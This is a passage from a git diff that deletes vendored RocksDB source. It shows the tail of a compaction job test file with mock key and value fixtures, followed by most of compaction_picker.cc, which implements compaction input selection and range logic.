-      {KeyStr("E", 5U, kTypeSingleDeletion), ""},
-      {KeyStr("E", 4U, kTypeValue), "val"},
-      {KeyStr("F", 6U, kTypeSingleDeletion), ""},
-      {KeyStr("F", 5U, kTypeValue), "val"},
-      {KeyStr("F", 4U, kTypeSingleDeletion), ""},
-      {KeyStr("F", 3U, kTypeValue), "val"},
-      {KeyStr("G", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("H", 6U, kTypeSingleDeletion), ""},
-      {KeyStr("H", 5U, kTypeValue), "val"},
-      {KeyStr("H", 4U, kTypeSingleDeletion), ""},
-      {KeyStr("H", 3U, kTypeValue), "val"},
-      {KeyStr("I", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("I", 11U, kTypeValue), "val"},
-      {KeyStr("J", 6U, kTypeSingleDeletion), ""},
-      {KeyStr("J", 5U, kTypeSingleDeletion), ""},
-      {KeyStr("J", 4U, kTypeValue), "val"},
-      {KeyStr("J", 3U, kTypeSingleDeletion), ""},
-      {KeyStr("J", 2U, kTypeValue), "val"},
-      {KeyStr("K", 8U, kTypeValue), "val3"},
-      {KeyStr("K", 7U, kTypeValue), "val4"},
-      {KeyStr("K", 6U, kTypeSingleDeletion), ""},
-      {KeyStr("K", 5U, kTypeValue), "val5"},
-      {KeyStr("K", 2U, kTypeSingleDeletion), ""},
-      {KeyStr("K", 1U, kTypeSingleDeletion), ""},
-      {KeyStr("L", 5U, kTypeSingleDeletion), ""},
-      {KeyStr("L", 4U, kTypeValue), "val"},
-      {KeyStr("L", 3U, kTypeDeletion), ""},
-      {KeyStr("L", 2U, kTypeValue), "val"},
-      {KeyStr("L", 1U, kTypeSingleDeletion), ""},
-      {KeyStr("M", 10U, kTypeSingleDeletion), ""},
-      {KeyStr("M", 7U, kTypeValue), "val"},
-      {KeyStr("M", 5U, kTypeDeletion), ""},
-      {KeyStr("M", 4U, kTypeValue), "val"},
-      {KeyStr("M", 3U, kTypeSingleDeletion), ""},
-  });
-  AddMockFile(file2);
-
-  auto file3 = mock::MakeMockFile({
-      {KeyStr("D", 1U, kTypeValue), "val"},
-      {KeyStr("H", 1U, kTypeValue), "val"},
-      {KeyStr("I", 2U, kTypeValue), "val"},
-  });
-  AddMockFile(file3, 2);
-
-  auto file4 = mock::MakeMockFile({
-      {KeyStr("M", 1U, kTypeValue), "val"},
-  });
-  AddMockFile(file4, 2);
-
-  auto expected_results =
-      mock::MakeMockFile({{KeyStr("A", 14U, kTypeSingleDeletion), ""},
-                          {KeyStr("A", 13U, kTypeValue), ""},
-                          {KeyStr("A", 12U, kTypeSingleDeletion), ""},
-                          {KeyStr("A", 10U, kTypeValue), "val"},
-                          {KeyStr("B", 14U, kTypeSingleDeletion), ""},
-                          {KeyStr("B", 13U, kTypeValue), ""},
-                          {KeyStr("C", 14U, kTypeValue), "val3"},
-                          {KeyStr("D", 12U, kTypeSingleDeletion), ""},
-                          {KeyStr("D", 11U, kTypeValue), ""},
-                          {KeyStr("D", 10U, kTypeSingleDeletion), ""},
-                          {KeyStr("E", 12U, kTypeSingleDeletion), ""},
-                          {KeyStr("E", 11U, kTypeValue), ""},
-                          {KeyStr("G", 15U, kTypeValue), "val"},
-                          {KeyStr("G", 12U, kTypeSingleDeletion), ""},
-                          {KeyStr("I", 14U, kTypeSingleDeletion), ""},
-                          {KeyStr("I", 13U, kTypeValue), ""},
-                          {KeyStr("J", 15U, kTypeValue), "val"},
-                          {KeyStr("K", 16U, kTypeSingleDeletion), ""},
-                          {KeyStr("K", 15U, kTypeValue), ""},
-                          {KeyStr("K", 11U, kTypeSingleDeletion), ""},
-                          {KeyStr("K", 8U, kTypeValue), "val3"},
-                          {KeyStr("L", 16U, kTypeSingleDeletion), ""},
-                          {KeyStr("L", 15U, kTypeValue), ""},
-                          {KeyStr("M", 16U, kTypeDeletion), ""},
-                          {KeyStr("M", 3U, kTypeSingleDeletion), ""}});
-
-  SetLastSequence(22U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results, {10U}, 10U);
-}
-
-// This test documents the behavior where a corrupt key follows a deletion or a
-// single deletion and the (single) deletion gets removed while the corrupt key
-// gets written out. TODO(noetzli): We probably want a better way to treat
-// corrupt keys.
-TEST_F(CompactionJobTest, CorruptionAfterDeletion) {
-  NewDB();
-
-  auto file1 =
-      mock::MakeMockFile({{test::KeyStr("A", 6U, kTypeValue), "val3"},
-                          {test::KeyStr("a", 5U, kTypeDeletion), ""},
-                          {test::KeyStr("a", 4U, kTypeValue, true), "val"}});
-  AddMockFile(file1);
-
-  auto file2 =
-      mock::MakeMockFile({{test::KeyStr("b", 3U, kTypeSingleDeletion), ""},
-                          {test::KeyStr("b", 2U, kTypeValue, true), "val"},
-                          {test::KeyStr("c", 1U, kTypeValue), "val2"}});
-  AddMockFile(file2);
-
-  auto expected_results =
-      mock::MakeMockFile({{test::KeyStr("A", 0U, kTypeValue), "val3"},
-                          {test::KeyStr("a", 0U, kTypeValue, true), "val"},
-                          {test::KeyStr("b", 0U, kTypeValue, true), "val"},
-                          {test::KeyStr("c", 1U, kTypeValue), "val2"}});
-
-  SetLastSequence(6U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr,
-          "SKIPPED as CompactionJobStats is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/compaction_picker.cc b/thirdparty/rocksdb/db/compaction_picker.cc
deleted file mode 100644
index 79af3ed..0000000
--- a/thirdparty/rocksdb/db/compaction_picker.cc
+++ /dev/null
@@ -1,1594 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/compaction_picker.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <limits>
-#include <queue>
-#include <string>
-#include <utility>
-#include "db/column_family.h"
-#include "monitoring/statistics.h"
-#include "util/filename.h"
-#include "util/log_buffer.h"
-#include "util/random.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-namespace {
-uint64_t TotalCompensatedFileSize(const std::vector<FileMetaData*>& files) {
-  uint64_t sum = 0;
-  for (size_t i = 0; i < files.size() && files[i]; i++) {
-    sum += files[i]->compensated_file_size;
-  }
-  return sum;
-}
-
-bool FindIntraL0Compaction(const std::vector<FileMetaData*>& level_files,
-                           size_t min_files_to_compact,
-                           uint64_t max_compact_bytes_per_del_file,
-                           CompactionInputFiles* comp_inputs) {
-  size_t compact_bytes = level_files[0]->fd.file_size;
-  size_t compact_bytes_per_del_file = port::kMaxSizet;
-  // compaction range will be [0, span_len).
-  size_t span_len;
-  // pull in files until the amount of compaction work per deleted file begins
-  // increasing.
-  size_t new_compact_bytes_per_del_file = 0;
-  for (span_len = 1; span_len < level_files.size(); ++span_len) {
-    compact_bytes += level_files[span_len]->fd.file_size;
-    new_compact_bytes_per_del_file = compact_bytes / span_len;
-    if (level_files[span_len]->being_compacted ||
-        new_compact_bytes_per_del_file > compact_bytes_per_del_file) {
-      break;
-    }
-    compact_bytes_per_del_file = new_compact_bytes_per_del_file;
-  }
-
-  if (span_len >= min_files_to_compact &&
-      new_compact_bytes_per_del_file < max_compact_bytes_per_del_file) {
-    assert(comp_inputs != nullptr);
-    comp_inputs->level = 0;
-    for (size_t i = 0; i < span_len; ++i) {
-      comp_inputs->files.push_back(level_files[i]);
-    }
-    return true;
-  }
-  return false;
-}
-}  // anonymous namespace
-
-// Determine compression type, based on user options, level of the output
-// file and whether compression is disabled.
-// If enable_compression is false, then compression is always disabled no
-// matter what the values of the other two parameters are.
-// Otherwise, the compression type is determined based on options and level.
-CompressionType GetCompressionType(const ImmutableCFOptions& ioptions,
-                                   const VersionStorageInfo* vstorage,
-                                   const MutableCFOptions& mutable_cf_options,
-                                   int level, int base_level,
-                                   const bool enable_compression) {
-  if (!enable_compression) {
-    // disable compression
-    return kNoCompression;
-  }
-
-  // If bottommost_compression is set and we are compacting to the
-  // bottommost level then we should use it.
-  if (ioptions.bottommost_compression != kDisableCompressionOption &&
-      level > base_level && level >= (vstorage->num_non_empty_levels() - 1)) {
-    return ioptions.bottommost_compression;
-  }
-  // If the user has specified a different compression level for each level,
-  // then pick the compression for that level.
-  if (!ioptions.compression_per_level.empty()) {
-    assert(level == 0 || level >= base_level);
-    int idx = (level == 0) ? 0 : level - base_level + 1;
-
-    const int n = static_cast<int>(ioptions.compression_per_level.size()) - 1;
-    // It is possible for level_ to be -1; in that case, we use level
-    // 0's compression.  This occurs mostly in backwards compatibility
-    // situations when the builder doesn't know what level the file
-    // belongs to.  Likewise, if level is beyond the end of the
-    // specified compression levels, use the last value.
-    return ioptions.compression_per_level[std::max(0, std::min(idx, n))];
-  } else {
-    return mutable_cf_options.compression;
-  }
-}
-
-CompactionPicker::CompactionPicker(const ImmutableCFOptions& ioptions,
-                                   const InternalKeyComparator* icmp)
-    : ioptions_(ioptions), icmp_(icmp) {}
-
-CompactionPicker::~CompactionPicker() {}
-
-// Delete this compaction from the list of running compactions.
-void CompactionPicker::ReleaseCompactionFiles(Compaction* c, Status status) {
-  UnregisterCompaction(c);
-  if (!status.ok()) {
-    c->ResetNextCompactionIndex();
-  }
-}
-
-void CompactionPicker::GetRange(const CompactionInputFiles& inputs,
-                                InternalKey* smallest,
-                                InternalKey* largest) const {
-  const int level = inputs.level;
-  assert(!inputs.empty());
-  smallest->Clear();
-  largest->Clear();
-
-  if (level == 0) {
-    for (size_t i = 0; i < inputs.size(); i++) {
-      FileMetaData* f = inputs[i];
-      if (i == 0) {
-        *smallest = f->smallest;
-        *largest = f->largest;
-      } else {
-        if (icmp_->Compare(f->smallest, *smallest) < 0) {
-          *smallest = f->smallest;
-        }
-        if (icmp_->Compare(f->largest, *largest) > 0) {
-          *largest = f->largest;
-        }
-      }
-    }
-  } else {
-    *smallest = inputs[0]->smallest;
-    *largest = inputs[inputs.size() - 1]->largest;
-  }
-}
-
-void CompactionPicker::GetRange(const CompactionInputFiles& inputs1,
-                                const CompactionInputFiles& inputs2,
-                                InternalKey* smallest,
-                                InternalKey* largest) const {
-  assert(!inputs1.empty() || !inputs2.empty());
-  if (inputs1.empty()) {
-    GetRange(inputs2, smallest, largest);
-  } else if (inputs2.empty()) {
-    GetRange(inputs1, smallest, largest);
-  } else {
-    InternalKey smallest1, smallest2, largest1, largest2;
-    GetRange(inputs1, &smallest1, &largest1);
-    GetRange(inputs2, &smallest2, &largest2);
-    *smallest =
-        icmp_->Compare(smallest1, smallest2) < 0 ? smallest1 : smallest2;
-    *largest = icmp_->Compare(largest1, largest2) < 0 ? largest2 : largest1;
-  }
-}
-
-void CompactionPicker::GetRange(const std::vector<CompactionInputFiles>& inputs,
-                                InternalKey* smallest,
-                                InternalKey* largest) const {
-  InternalKey current_smallest;
-  InternalKey current_largest;
-  bool initialized = false;
-  for (const auto& in : inputs) {
-    if (in.empty()) {
-      continue;
-    }
-    GetRange(in, &current_smallest, &current_largest);
-    if (!initialized) {
-      *smallest = current_smallest;
-      *largest = current_largest;
-      initialized = true;
-    } else {
-      if (icmp_->Compare(current_smallest, *smallest) < 0) {
-        *smallest = current_smallest;
-      }
-      if (icmp_->Compare(current_largest, *largest) > 0) {
-        *largest = current_largest;
-      }
-    }
-  }
-  assert(initialized);
-}
-
-bool CompactionPicker::ExpandInputsToCleanCut(const std::string& cf_name,
-                                              VersionStorageInfo* vstorage,
-                                              CompactionInputFiles* inputs) {
-  // This isn't good compaction
-  assert(!inputs->empty());
-
-  const int level = inputs->level;
-  // GetOverlappingInputs will always do the right thing for level-0.
-  // So we don't need to do any expansion if level == 0.
-  if (level == 0) {
-    return true;
-  }
-
-  InternalKey smallest, largest;
-
-  // Keep expanding inputs until we are sure that there is a "clean cut"
-  // boundary between the files in input and the surrounding files.
-  // This will ensure that no parts of a key are lost during compaction.
-  int hint_index = -1;
-  size_t old_size;
-  do {
-    old_size = inputs->size();
-    GetRange(*inputs, &smallest, &largest);
-    inputs->clear();
-    vstorage->GetOverlappingInputs(level, &smallest, &largest, &inputs->files,
-                                   hint_index, &hint_index);
-  } while (inputs->size() > old_size);
-
-  // we started off with inputs non-empty and the previous loop only grew
-  // inputs. thus, inputs should be non-empty here
-  assert(!inputs->empty());
-
-  // If, after the expansion, there are files that are already under
-  // compaction, then we must drop/cancel this compaction.
-  if (AreFilesInCompaction(inputs->files)) {
-    return false;
-  }
-  return true;
-}
-
-bool CompactionPicker::RangeOverlapWithCompaction(
-    const Slice& smallest_user_key, const Slice& largest_user_key,
-    int level) const {
-  const Comparator* ucmp = icmp_->user_comparator();
-  for (Compaction* c : compactions_in_progress_) {
-    if (c->output_level() == level &&
-        ucmp->Compare(smallest_user_key, c->GetLargestUserKey()) <= 0 &&
-        ucmp->Compare(largest_user_key, c->GetSmallestUserKey()) >= 0) {
-      // Overlap
-      return true;
-    }
-  }
-  // Did not overlap with any running compaction in level `level`
-  return false;
-}
-
-bool CompactionPicker::FilesRangeOverlapWithCompaction(
-    const std::vector<CompactionInputFiles>& inputs, int level) const {
-  bool is_empty = true;
-  for (auto& in : inputs) {
-    if (!in.empty()) {
-      is_empty = false;
-      break;
-    }
-  }
-  if (is_empty) {
-    // No files in inputs
-    return false;
-  }
-
-  InternalKey smallest, largest;
-  GetRange(inputs, &smallest, &largest);
-  return RangeOverlapWithCompaction(smallest.user_key(), largest.user_key(),
-                                    level);
-}
-
-// Returns true if any one of specified files are being compacted
-bool CompactionPicker::AreFilesInCompaction(
-    const std::vector<FileMetaData*>& files) {
-  for (size_t i = 0; i < files.size(); i++) {
-    if (files[i]->being_compacted) {
-      return true;
-    }
-  }
-  return false;
-}
-
-Compaction* CompactionPicker::CompactFiles(
-    const CompactionOptions& compact_options,
-    const std::vector<CompactionInputFiles>& input_files, int output_level,
-    VersionStorageInfo* vstorage, const MutableCFOptions& mutable_cf_options,
-    uint32_t output_path_id) {
-  assert(input_files.size());
-
-  // TODO(rven ): we might be able to run concurrent level 0 compaction
-  // if the key ranges of the two compactions do not overlap, but for now
-  // we do not allow it.
-  if ((input_files[0].level == 0) && !level0_compactions_in_progress_.empty()) {
-    return nullptr;
-  }
-  // This compaction output could overlap with a running compaction
-  if (FilesRangeOverlapWithCompaction(input_files, output_level)) {
-    return nullptr;
-  }
-  auto c =
-      new Compaction(vstorage, ioptions_, mutable_cf_options, input_files,
-                     output_level, compact_options.output_file_size_limit,
-                     mutable_cf_options.max_compaction_bytes, output_path_id,
-                     compact_options.compression, /* grandparents */ {}, true);
-
-  // If it's level 0 compaction, make sure we don't execute any other level 0
-  // compactions in parallel
-  RegisterCompaction(c);
-  return c;
-}
-
-Status CompactionPicker::GetCompactionInputsFromFileNumbers(
-    std::vector<CompactionInputFiles>* input_files,
-    std::unordered_set<uint64_t>* input_set, const VersionStorageInfo* vstorage,
-    const CompactionOptions& compact_options) const {
-  if (input_set->size() == 0U) {
-    return Status::InvalidArgument(
-        "Compaction must include at least one file.");
-  }
-  assert(input_files);
-
-  std::vector<CompactionInputFiles> matched_input_files;
-  matched_input_files.resize(vstorage->num_levels());
-  int first_non_empty_level = -1;
-  int last_non_empty_level = -1;
-  // TODO(yhchiang): use a lazy-initialized mapping from
-  //                 file_number to FileMetaData in Version.
-  for (int level = 0; level < vstorage->num_levels(); ++level) {
-    for (auto file : vstorage->LevelFiles(level)) {
-      auto iter = input_set->find(file->fd.GetNumber());
-      if (iter != input_set->end()) {
-        matched_input_files[level].files.push_back(file);
-        input_set->erase(iter);
-        last_non_empty_level = level;
-        if (first_non_empty_level == -1) {
-          first_non_empty_level = level;
-        }
-      }
-    }
-  }
-
-  if (!input_set->empty()) {
-    std::string message(
-        "Cannot find matched SST files for the following file numbers:");
-    for (auto fn : *input_set) {
-      message += " ";
-      message += ToString(fn);
-    }
-    return Status::InvalidArgument(message);
-  }
-
-  for (int level = first_non_empty_level; level <= last_non_empty_level;
-       ++level) {
-    matched_input_files[level].level = level;
-    input_files->emplace_back(std::move(matched_input_files[level]));
-  }
-
-  return Status::OK();
-}
-
-// Returns true if any one of the parent files are being compacted
-bool CompactionPicker::IsRangeInCompaction(VersionStorageInfo* vstorage,
-                                           const InternalKey* smallest,
-                                           const InternalKey* largest,
-                                           int level, int* level_index) {
-  std::vector<FileMetaData*> inputs;
-  assert(level < NumberLevels());
-
-  vstorage->GetOverlappingInputs(level, smallest, largest, &inputs,
-                                 *level_index, level_index);
-  return AreFilesInCompaction(inputs);
-}
-
-// Populates the set of inputs of all other levels that overlap with the
-// start level.
-// Now we assume all levels except start level and output level are empty.
-// Will also attempt to expand "start level" if that doesn't expand
-// "output level" or cause "level" to include a file for compaction that has an
-// overlapping user-key with another file.
-// REQUIRES: input_level and output_level are different
-// REQUIRES: inputs->empty() == false
-// Returns false if files on parent level are currently in compaction, which
-// means that we can't compact them
-bool CompactionPicker::SetupOtherInputs(
-    const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-    VersionStorageInfo* vstorage, CompactionInputFiles* inputs,
-    CompactionInputFiles* output_level_inputs, int* parent_index,
-    int base_index) {
-  assert(!inputs->empty());
-  assert(output_level_inputs->empty());
-  const int input_level = inputs->level;
-  const int output_level = output_level_inputs->level;
-  assert(input_level != output_level);
-
-  // For now, we only support merging two levels, start level and output level.
-  // We need to assert other levels are empty.
-  for (int l = input_level + 1; l < output_level; l++) {
-    assert(vstorage->NumLevelFiles(l) == 0);
-  }
-
-  InternalKey smallest, largest;
-
-  // Get the range one last time.
-  GetRange(*inputs, &smallest, &largest);
-
-  // Populate the set of next-level files (inputs_GetOutputLevelInputs()) to
-  // include in compaction
-  vstorage->GetOverlappingInputs(output_level, &smallest, &largest,
-                                 &output_level_inputs->files, *parent_index,
-                                 parent_index);
-  if (AreFilesInCompaction(output_level_inputs->files)) {
-    return false;
-  }
-  if (!output_level_inputs->empty()) {
-    if (!ExpandInputsToCleanCut(cf_name, vstorage, output_level_inputs)) {
-      return false;
-    }
-  }
-
-  // See if we can further grow the number of inputs in "level" without
-  // changing the number of "level+1" files we pick up. We also choose NOT
-  // to expand if this would cause "level" to include some entries for some
-  // user key, while excluding other entries for the same user key. This
-  // can happen when one user key spans multiple files.
-  if (!output_level_inputs->empty()) {
-    const uint64_t limit = mutable_cf_options.max_compaction_bytes;
-    const uint64_t output_level_inputs_size =
-        TotalCompensatedFileSize(output_level_inputs->files);
-    const uint64_t inputs_size = TotalCompensatedFileSize(inputs->files);
-    bool expand_inputs = false;
-
-    CompactionInputFiles expanded_inputs;
-    expanded_inputs.level = input_level;
-    // Get closed interval of output level
-    InternalKey all_start, all_limit;
-    GetRange(*inputs, *output_level_inputs, &all_start, &all_limit);
-    bool try_overlapping_inputs = true;
-    vstorage->GetOverlappingInputs(input_level, &all_start, &all_limit,
-                                   &expanded_inputs.files, base_index, nullptr);
-    uint64_t expanded_inputs_size =
-        TotalCompensatedFileSize(expanded_inputs.files);
-    if (!ExpandInputsToCleanCut(cf_name, vstorage, &expanded_inputs)) {
-      try_overlapping_inputs = false;
-    }
-    if (try_overlapping_inputs && expanded_inputs.size() > inputs->size() &&
-        output_level_inputs_size + expanded_inputs_size < limit &&
-        !AreFilesInCompaction(expanded_inputs.files)) {
-      InternalKey new_start, new_limit;
-      GetRange(expanded_inputs, &new_start, &new_limit);
-      CompactionInputFiles expanded_output_level_inputs;
-      expanded_output_level_inputs.level = output_level;
-      vstorage->GetOverlappingInputs(output_level, &new_start, &new_limit,
-                                     &expanded_output_level_inputs.files,
-                                     *parent_index, parent_index);
-      assert(!expanded_output_level_inputs.empty());
-      if (!AreFilesInCompaction(expanded_output_level_inputs.files) &&
-          ExpandInputsToCleanCut(cf_name, vstorage,
-                                 &expanded_output_level_inputs) &&
-          expanded_output_level_inputs.size() == output_level_inputs->size()) {
-        expand_inputs = true;
-      }
-    }
-    if (!expand_inputs) {
-      vstorage->GetCleanInputsWithinInterval(input_level, &all_start,
-                                             &all_limit, &expanded_inputs.files,
-                                             base_index, nullptr);
-      expanded_inputs_size = TotalCompensatedFileSize(expanded_inputs.files);
-      if (expanded_inputs.size() > inputs->size() &&
-          output_level_inputs_size + expanded_inputs_size < limit &&
-          !AreFilesInCompaction(expanded_inputs.files)) {
-        expand_inputs = true;
-      }
-    }
-    if (expand_inputs) {
-      ROCKS_LOG_INFO(ioptions_.info_log,
-                     "[%s] Expanding@%d %" ROCKSDB_PRIszt "+%" ROCKSDB_PRIszt
-                     "(%" PRIu64 "+%" PRIu64 " bytes) to %" ROCKSDB_PRIszt
-                     "+%" ROCKSDB_PRIszt " (%" PRIu64 "+%" PRIu64 "bytes)\n",
-                     cf_name.c_str(), input_level, inputs->size(),
-                     output_level_inputs->size(), inputs_size,
-                     output_level_inputs_size, expanded_inputs.size(),
-                     output_level_inputs->size(), expanded_inputs_size,
-                     output_level_inputs_size);
-      inputs->files = expanded_inputs.files;
-    }
-  }
-  return true;
-}
-
-void CompactionPicker::GetGrandparents(
-    VersionStorageInfo* vstorage, const CompactionInputFiles& inputs,
-    const CompactionInputFiles& output_level_inputs,
-    std::vector<FileMetaData*>* grandparents) {
-  InternalKey start, limit;
-  GetRange(inputs, output_level_inputs, &start, &limit);
-  // Compute the set of grandparent files that overlap this compaction
-  // (parent == level+1; grandparent == level+2)
-  if (output_level_inputs.level + 1 < NumberLevels()) {
-    vstorage->GetOverlappingInputs(output_level_inputs.level + 1, &start,
-                                   &limit, grandparents);
-  }
-}
-
-Compaction* CompactionPicker::CompactRange(
-    const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-    VersionStorageInfo* vstorage, int input_level, int output_level,
-    uint32_t output_path_id, const InternalKey* begin, const InternalKey* end,
-    InternalKey** compaction_end, bool* manual_conflict) {
-  // CompactionPickerFIFO has its own implementation of compact range
-  assert(ioptions_.compaction_style != kCompactionStyleFIFO);
-
-  if (input_level == ColumnFamilyData::kCompactAllLevels) {
-    assert(ioptions_.compaction_style == kCompactionStyleUniversal);
-
-    // Universal compaction with more than one level always compacts all the
-    // files together to the last level.
-    assert(vstorage->num_levels() > 1);
-    // DBImpl::CompactRange() set output level to be the last level
-    if (ioptions_.allow_ingest_behind) {
-      assert(output_level == vstorage->num_levels() - 2);
-    } else {
-      assert(output_level == vstorage->num_levels() - 1);
-    }
-    // DBImpl::RunManualCompaction will make full range for universal compaction
-    assert(begin == nullptr);
-    assert(end == nullptr);
-    *compaction_end = nullptr;
-
-    int start_level = 0;
-    for (; start_level < vstorage->num_levels() &&
-           vstorage->NumLevelFiles(start_level) == 0;
-         start_level++) {
-    }
-    if (start_level == vstorage->num_levels()) {
-      return nullptr;
-    }
-
-    if ((start_level == 0) && (!level0_compactions_in_progress_.empty())) {
-      *manual_conflict = true;
-      // Only one level 0 compaction allowed
-      return nullptr;
-    }
-
-    std::vector<CompactionInputFiles> inputs(vstorage->num_levels() -
-                                             start_level);
-    for (int level = start_level; level < vstorage->num_levels(); level++) {
-      inputs[level - start_level].level = level;
-      auto& files = inputs[level - start_level].files;
-      for (FileMetaData* f : vstorage->LevelFiles(level)) {
-        files.push_back(f);
-      }
-      if (AreFilesInCompaction(files)) {
-        *manual_conflict = true;
-        return nullptr;
-      }
-    }
-
-    // 2 non-exclusive manual compactions could run at the same time producing
-    // overlaping outputs in the same level.
-    if (FilesRangeOverlapWithCompaction(inputs, output_level)) {
-      // This compaction output could potentially conflict with the output
-      // of a currently running compaction, we cannot run it.
-      *manual_conflict = true;
-      return nullptr;
-    }
-
-    Compaction* c = new Compaction(
-        vstorage, ioptions_, mutable_cf_options, std::move(inputs),
-        output_level, mutable_cf_options.MaxFileSizeForLevel(output_level),
-        /* max_compaction_bytes */ LLONG_MAX, output_path_id,
-        GetCompressionType(ioptions_, vstorage, mutable_cf_options,
-                           output_level, 1),
-        /* grandparents */ {}, /* is manual */ true);
-    RegisterCompaction(c);
-    return c;
-  }
-
-  CompactionInputFiles inputs;
-  inputs.level = input_level;
-  bool covering_the_whole_range = true;
-
-  // All files are 'overlapping' in universal style compaction.
-  // We have to compact the entire range in one shot.
-  if (ioptions_.compaction_style == kCompactionStyleUniversal) {
-    begin = nullptr;
-    end = nullptr;
-  }
-
-  vstorage->GetOverlappingInputs(input_level, begin, end, &inputs.files);
-  if (inputs.empty()) {
-    return nullptr;
-  }
-
-  if ((input_level == 0) && (!level0_compactions_in_progress_.empty())) {
-    // Only one level 0 compaction allowed
-    TEST_SYNC_POINT("CompactionPicker::CompactRange:Conflict");
-    *manual_conflict = true;
-    return nullptr;
-  }
-
-  // Avoid compacting too much in one shot in case the range is large.
-  // But we cannot do this for level-0 since level-0 files can overlap
-  // and we must not pick one file and drop another older file if the
-  // two files overlap.
-  if (input_level > 0) {
-    const uint64_t limit = mutable_cf_options.max_compaction_bytes;
-    uint64_t total = 0;
-    for (size_t i = 0; i + 1 < inputs.size(); ++i) {
-      uint64_t s = inputs[i]->compensated_file_size;
-      total += s;
-      if (total >= limit) {
-        **compaction_end = inputs[i + 1]->smallest;
-        covering_the_whole_range = false;
-        inputs.files.resize(i + 1);
-        break;
-      }
-    }
-  }
-  assert(output_path_id < static_cast<uint32_t>(ioptions_.db_paths.size()));
-
-  if (ExpandInputsToCleanCut(cf_name, vstorage, &inputs) == false) {
-    // manual compaction is now multi-threaded, so it can
-    // happen that ExpandWhileOverlapping fails
-    // we handle it higher in RunManualCompaction
-    *manual_conflict = true;
-    return nullptr;
-  }
-
-  if (covering_the_whole_range) {
-    *compaction_end = nullptr;
-  }
-
-  CompactionInputFiles output_level_inputs;
-  if (output_level == ColumnFamilyData::kCompactToBaseLevel) {
-    assert(input_level == 0);
-    output_level = vstorage->base_level();
-    assert(output_level > 0);
-  }
-  output_level_inputs.level = output_level;
-  if (input_level != output_level) {
-    int parent_index = -1;
-    if (!SetupOtherInputs(cf_name, mutable_cf_options, vstorage, &inputs,
-                          &output_level_inputs, &parent_index, -1)) {
-      // manual compaction is now multi-threaded, so it can
-      // happen that SetupOtherInputs fails
-      // we handle it higher in RunManualCompaction
-      *manual_conflict = true;
-      return nullptr;
-    }
-  }
-
-  std::vector<CompactionInputFiles> compaction_inputs({inputs});
-  if (!output_level_inputs.empty()) {
-    compaction_inputs.push_back(output_level_inputs);
-  }
-  for (size_t i = 0; i < compaction_inputs.size(); i++) {
-    if (AreFilesInCompaction(compaction_inputs[i].files)) {
-      *manual_conflict = true;
-      return nullptr;
-    }
-  }
-
-  // 2 non-exclusive manual compactions could run at the same time producing
-  // overlaping outputs in the same level.
-  if (FilesRangeOverlapWithCompaction(compaction_inputs, output_level)) {
-    // This compaction output could potentially conflict with the output
-    // of a currently running compaction, we cannot run it.
-    *manual_conflict = true;
-    return nullptr;
-  }
-
-  std::vector<FileMetaData*> grandparents;
-  GetGrandparents(vstorage, inputs, output_level_inputs, &grandparents);
-  Compaction* compaction = new Compaction(
-      vstorage, ioptions_, mutable_cf_options, std::move(compaction_inputs),
-      output_level, mutable_cf_options.MaxFileSizeForLevel(output_level),
-      mutable_cf_options.max_compaction_bytes, output_path_id,
-      GetCompressionType(ioptions_, vstorage, mutable_cf_options, output_level,
-                         vstorage->base_level()),
-      std::move(grandparents), /* is manual compaction */ true);
-
-  TEST_SYNC_POINT_CALLBACK("CompactionPicker::CompactRange:Return", compaction);
-  RegisterCompaction(compaction);
-
-  // Creating a compaction influences the compaction score because the score
-  // takes running compactions into account (by skipping files that are already
-  // being compacted). Since we just changed compaction score, we recalculate it
-  // here
-  vstorage->ComputeCompactionScore(ioptions_, mutable_cf_options);
-
-  return compaction;
-}
-
-#ifndef ROCKSDB_LITE
-namespace {
-// Test whether two files have overlapping key-ranges.
-bool HaveOverlappingKeyRanges(const Comparator* c, const SstFileMetaData& a,
-                              const SstFileMetaData& b) {
-  if (c->Compare(a.smallestkey, b.smallestkey) >= 0) {
-    if (c->Compare(a.smallestkey, b.largestkey) <= 0) {
-      // b.smallestkey <= a.smallestkey <= b.largestkey
-      return true;
-    }
-  } else if (c->Compare(a.largestkey, b.smallestkey) >= 0) {
-    // a.smallestkey < b.smallestkey <= a.largestkey
-    return true;
-  }
-  if (c->Compare(a.largestkey, b.largestkey) <= 0) {
-    if (c->Compare(a.largestkey, b.smallestkey) >= 0) {
-      // b.smallestkey <= a.largestkey <= b.largestkey
-      return true;
-    }
-  } else if (c->Compare(a.smallestkey, b.largestkey) <= 0) {
-    // a.smallestkey <= b.largestkey < a.largestkey
-    return true;
-  }
-  return false;
-}
-}  // namespace
-
-Status CompactionPicker::SanitizeCompactionInputFilesForAllLevels(
-    std::unordered_set<uint64_t>* input_files,
-    const ColumnFamilyMetaData& cf_meta, const int output_level) const {
-  auto& levels = cf_meta.levels;
-  auto comparator = icmp_->user_comparator();
-
-  // TODO(yhchiang): If there is any input files of L1 or up and there
-  // is at least one L0 files. All L0 files older than the L0 file needs
-  // to be included. Otherwise, it is a false conditoin
-
-  // TODO(yhchiang): add is_adjustable to CompactionOptions
-
-  // the smallest and largest key of the current compaction input
-  std::string smallestkey;
-  std::string largestkey;
-  // a flag for initializing smallest and largest key
-  bool is_first = false;
-  const int kNotFound = -1;
-
